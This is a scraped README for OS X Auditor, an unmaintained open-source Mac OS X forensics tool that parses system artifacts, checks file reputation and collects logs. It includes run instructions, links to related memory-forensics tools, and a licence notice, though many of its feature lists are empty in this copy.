Home

Awesome

OS X Auditor

Maintenance No Maintenance Intended

OS X Auditor is a free Mac OS X computer forensics tool.

OS X Auditor parses and hashes the following artifacts on the running system or a copy of a system you want to analyze:

It extracts:

It also looks for suspicious keywords in the .plist themselves.

It can verify the reputation of each file on:

It can aggregate all logs from the following directories into a zipball:

Finally, the results can be:

Author

Jean-Philippe Teissier - @Jipe_ & al.

Development status

OS X Auditor IS NO LONGER MAINTAINED - YOU SHOULD NOT USE IT

Support

OS X Auditor started as a week-end project and is no longer maintained. It has been forked by the great guys @ Yelp who created osxcollector.

I do recommend you to use to osxcollector (https://github.com/Yelp/osxcollector)

How to install

Just copy all files from GitHub.

Dependencies

If you plan to run OS X Auditor on a Mac, you will get a full plist parsing support with the OS X Foundation through pyobjc:

If you can't install pyobjc or if you plan to run OS X Auditor on another OS than Mac OS X, you may experience some troubles with the plist parsing:

These dependencies will be removed when a working native plist module will be available in python

How to run

Type osxauditor.py -h to get all the available options, then run it with the selected options

eg. [sudo -E] python osxauditor.py -a -m -l localhashes.db -H log.html

Setting Environment Variables

VirusTotal API:

export VT_API_KEY=aaaabbbbccccddddeeee

Changelog

0.4.3

0.4.2

0.4.1

0.4

0.3.1

0.3

0.2.1

0.2

0.1

Design & Capabilities

Design & Capabilities

Artifacts

Users

System

TODO

Related work

Disk Arbitrator

Disk Arbitrator is Mac OS X forensic utility designed to help the user ensure correct forensic procedures are followed during imaging of a disk device. Disk Arbitrator is essentially a user interface to the Disk Arbitration framework, which enables a program to participate in the management of block storage devices, including the automatic mounting of file systems. When enabled, Disk Arbitrator will block the mounting of file systems to avoid mounting as read-write and violating the integrity of the evidence.

https://github.com/aburgh/Disk-Arbitrator

Volafox

volafox a.k.a 'Mac OS X Memory Analysis Toolkit' is developed on python 2.x

https://code.google.com/p/volafox/

Mandiant Memoryze(tm) for the Mac

Memoryze for the Mac is free memory forensic software that helps incident responders find evil in memory… on Macs. Memoryze for the Mac can acquire and/or analyze memory images. Analysis can be performed on offline memory images or on live systems.

http://www.mandiant.com/resources/download/mac-memoryze

Volatility MacMemoryForensics

https://code.google.com/p/volatility/wiki/MacMemoryForensics

License

OS X Auditor Copyright (C) 2013-2015 Jean-Philippe Teissier

This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.

This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details.

You should have received a copy of the GNU General Public License along with this program. If not, see http://www.gnu.org/licenses/.

Bootstrap and JQuery have their own GPL compatible licences.